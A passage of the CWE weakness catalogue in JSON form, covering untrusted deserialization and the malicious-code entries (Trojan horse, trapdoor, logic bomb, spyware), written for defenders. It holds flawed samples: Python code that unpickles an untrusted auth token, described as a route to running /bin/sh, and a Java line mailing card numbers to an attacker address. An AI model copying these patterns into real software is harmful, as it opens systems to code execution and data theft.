token.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Python"},"xhtml:div":{"#text":"try {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"class ExampleProtocol(protocol.Protocol):def dataReceived(self, data):# Code that would be here would parse the incoming data# After receiving headers, call confirmAuth() to authenticatedef confirmAuth(self, headers):try:token = cPickle.loads(base64.b64decode(headers[\'AuthToken\']))if not check_hmac(token[\'signature\'], token[\'data\'], getSecretKey()):raise AuthFailself.secure_data = token[\'data\']except:raise AuthFail","xhtml:br":["","","","","","","","","","","","",""]}}}},"Body_Text":"Unfortunately, the code does not verify that the incoming data is legitimate. An attacker can construct a illegitimate, serialized object \\"AuthToken\\" that instantiates one of Python\'s subprocesses to execute arbitrary commands. For instance,the attacker could construct a pickle that leverages Python\'s subprocess module, which spawns new processes and includes a number of arguments for various uses. Since Pickle allows objects to define the process for how they should be unpickled, the attacker can direct the unpickle process to call Popen in the subprocess module and execute /bin/sh."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-12799","Description":"chain: bypass of untrusted deserialization issue (CWE-502) by using an assumed-trusted class (CWE-183)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12799"},{"Reference":"CVE-2015-8103","Description":"Deserialization issue in commonly-used Java library allows remote execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8103"},{"Reference":"CVE-2015-4852","Description":"Deserialization issue in commonly-used Java library allows remote execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4852"},{"Reference":"CVE-2013-1465","Description":"Use of PHP unserialize function on untrusted input allows attacker to modify application configuration.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1465"},{"Reference":"CVE-2012-3527","Description":"Use of PHP unserialize function on untrusted input in content management system might allow code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3527"},{"Reference":"CVE-2012-0911","Description":"Use of PHP unserialize function on untrusted input in content management system allows code execution using a crafted cookie value.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0911"},{"Reference":"CVE-2012-0911","Description":"Content management system written in PHP allows unserialize of arbitrary objects, possibly allowing code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0911"},{"Reference":"CVE-2011-2520","Description":"Python script allows local users to execute code via pickled data.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2520"},{"Reference":"CVE-2012-4406","Description":"Unsafe deserialization using pickle in a Python script.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4406"},{"Reference":"CVE-2003-0791","Description":"Web browser allows execution of native methods via a crafted string to a JavaScript function that deserializes the string.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0791"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Deserialization of untrusted data"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SER01-J","Entry_Name":"Do not deviate from the proper signatures of serialization methods"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SER03-J","Entry_Name":"Do not serialize unencrypted, sensitive data"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SER06-J","Entry_Name":"Make defensive copies of private mutable components during deserialization"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SER08-J","Entry_Name":"Do not use the default serialized form for implementation defined invariants"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP25","Entry_Name":"Tainted input to variable"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"586"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-461"}},{"attr":{"@_External_Reference_ID":"REF-462"}},{"attr":{"@_External_Reference_ID":"REF-463"}},{"attr":{"@_External_Reference_ID":"REF-464"}},{"attr":{"@_External_Reference_ID":"REF-465"}},{"attr":{"@_External_Reference_ID":"REF-466"}},{"attr":{"@_External_Reference_ID":"REF-467"}},{"attr":{"@_External_Reference_ID":"REF-468"}}]},"Notes":{"Note":{"#text":"The relationships between CWE-502 and CWE-915 need further exploration. CWE-915 is more narrowly scoped to object modification, and is not necessarily used for deserialization.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Background_Details, Common_Consequences, Maintenance_Notes, Observed_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Modes_of_Introduction, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Alternate_Terms, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}]}},"506":{"attr":{"@_ID":"506","@_Name":"Embedded Malicious Code","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application contains code that appears to be malicious in nature.","Extended_Description":"Malicious flaws have acquired colorful names, including Trojan horse, trapdoor, timebomb, and logic-bomb. A developer might insert malicious code with the intent to subvert the security of an application or its host system at some time in the future. It generally refers to a program that performs a useful service but exploits rights of the program\'s user in a way the user does not intend.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Bundling"},{"Phase":"Distribution"},{"Phase":"Installation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Detection_Methods":{"Detection_Method":[{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies","Generated Code Inspection"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Automated Monitored Execution"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Origin Analysis"}}]}},"Effectiveness":"SOAR Partial"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Remove the malicious code and start an effort to ensure that no more malicious code exists. This may require a detailed review of all code, as it is possible to hide a serious attack in only one or two lines of code. These lines may be located almost anywhere in an application and may have been intentionally obfuscated by the attacker."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the example below, a malicous developer has injected code to send credit card numbers to the developer\'s own email address.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"boolean authorizeCard(String ccn) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"mailCardNumber(ccn, \\"evil_developer@evil_domain.com\\");","xhtml:br":["","","","",""],"xhtml:i":["// Authorize credit card.","..."]}}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Landwehr"},"Entry_Name":"Malicious"}},"Notes":{"Note":{"#text":"The term \\"Trojan horse\\" was introduced by Dan Edwards and recorded by James Anderson [18] to characterize a particular computer security threat; it has been redefined many times [4,18-20].","attr":{"@_Type":"Terminology"}}},"Content_History":{"Submission":{"Submission_Name":"Landwehr","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Other_Notes, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Time_of_Introduction"}],"Previous_Entry_Name":{"#text":"Malicious","attr":{"@_Date":"2008-01-30"}}}},"507":{"attr":{"@_ID":"507","@_Name":"Trojan Horse","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software appears to contain benign or useful functionality, but it also contains code that is hidden from normal operation that violates the intended security policy of the user or the system administrator.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"506","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Operation","Description":"Most antivirus software scans for Trojan Horses."},{"Phase":"Installation","Description":"Verify the integrity of the software that is being installed."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Landwehr"},"Entry_Name":"Trojan Horse"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 7, &#34;Viruses, Trojans, and Worms In a Nutshell&#34; Page 208"}}},"Notes":{"Note":[{"#text":"Potentially malicious dynamic code compiled at runtime can conceal any number of attacks that will not appear in the baseline. The use of dynamically compiled code could also allow the injection of attacks on post-deployed applications.","attr":{"@_Type":"Other"}},{"attr":{"@_Type":"Terminology"},"xhtml:p":["Definitions of \\"Trojan horse\\" and related terms have varied widely over the years, but common usage in 2008 generally refers to software that performs a legitimate function, but also contains malicious code.","Almost any malicious code can be called a Trojan horse, since the author of malicious code needs to disguise it somehow so that it will be invoked by a nonmalicious user (unless the author means also to invoke the code, in which case they presumably already possess the authorization to perform the intended sabotage). A Trojan horse that replicates itself by copying its code into other program files (see case MA1) is commonly referred to as a virus. One that replicates itself by creating new processes or files to contain its code, instead of modifying existing storage entities, is often called a worm. Denning provides a general discussion of these terms; differences of opinion about the term applicable to a particular flaw or its exploitations sometimes occur."]}]},"Content_History":{"Submission":{"Submission_Name":"Landwehr","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"508":{"attr":{"@_ID":"508","@_Name":"Non-Replicating Malicious Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Non-replicating malicious code only resides on the target system or software that is attacked; it does not attempt to spread to other systems.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"507","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Operation","Description":"Antivirus software can help mitigate known malicious code."},{"Phase":"Installation","Description":"Verify the integrity of the software that is being installed."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Landwehr"},"Entry_Name":"Non-Replicating"}},"Content_History":{"Submission":{"Submission_Name":"Landwehr","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Non-Replicating","attr":{"@_Date":"2008-01-30"}}}},"509":{"attr":{"@_ID":"509","@_Name":"Replicating Malicious Code (Virus or Worm)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Replicating malicious code, including viruses and worms, will attempt to attack other systems once it has successfully compromised the target system or software.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"507","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Operation","Description":"Antivirus software scans for viruses or worms."},{"Phase":"Installation","Description":"Always verify the integrity of the software that is being installed."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Landwehr"},"Entry_Name":"Replicating (virus)"}},"Content_History":{"Submission":{"Submission_Name":"Landwehr","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Replicating (virus)","attr":{"@_Date":"2008-01-30"}},{"#text":"Replicating Malicious Code (virus)","attr":{"@_Date":"2008-04-11"}}]}},"510":{"attr":{"@_ID":"510","@_Name":"Trapdoor","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A trapdoor is a hidden piece of code that responds to a special input, allowing its user access to resources without passing through the normal security enforcement mechanism.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"506","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Execute Unauthorized Code or Commands","Bypass Protection Mechanism"]}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inter-application Flow Analysis","Binary / Bytecode simple extractor - strings, ELF readers, etc."]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies","Generated Code Inspection"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Automated Monitored Execution","Forced Path Execution","Debugger","Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Context-configured Source Code Weakness Analyzer"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Installation","Description":"Always verify the integrity of the software that is being installed."},{"Phase":"Testing","Description":"Identify and closely inspect the conditions for entering privileged areas of the code, especially those related to authentication, process invocation, and network communications."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Landwehr"},"Entry_Name":"Trapdoor"}},"Content_History":{"Submission":{"Submission_Name":"Landwehr","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Detection_Factors, Relationships"}]}},"511":{"attr":{"@_ID":"511","@_Name":"Logic/Time Bomb","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains code that is designed to disrupt the legitimate operation of the software (or its environment) when a certain time passes, or when a certain logical condition is met.","Extended_Description":"When the time bomb or logic bomb is detonated, it may perform a denial of service such as crashing the system, deleting critical data, or degrading system response time. This bomb might be placed within either a replicating or non-replicating Trojan horse.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"506","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Other","Integrity"],"Impact":["Varies by Context","Alter Execution Logic"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Installation","Description":"Always verify the integrity of the software that is being installed."},{"Phase":"Testing","Description":"Conduct a code coverage analysis using live testing, then closely inspect any code that is not covered."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Typical examples of triggers include system date or time mechanisms, random number generators, and counters that wait for an opportunity to launch their payload. When triggered, a time-bomb may deny service by crashing the system, deleting files, or degrading system response-time."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Landwehr"},"Entry_Name":"Logic/Time Bomb"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-172"}}},"Content_History":{"Submission":{"Submission_Name":"Landwehr","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, Potential_Mitigations, References, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}]}},"512":{"attr":{"@_ID":"512","@_Name":"Spyware","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software collects personally identifiable information about a human user or the user\'s activities, but the software accesses this information using other resources besides itself, and it does not require that user\'s explicit approval or direct input into the software.","Extended_Description":"\\"Spyware\\" is a commonly used term with many definitions and interpretations. In general, it is meant to software that collects information or installs functionality that human users might not allow if they were fully aware of the actions being taken by the software. For example, a user might expect that tax software would collect a social security number and include it when filing a tax return, but that same user would not expect gaming software to obtain the social security number from that tax software\'s 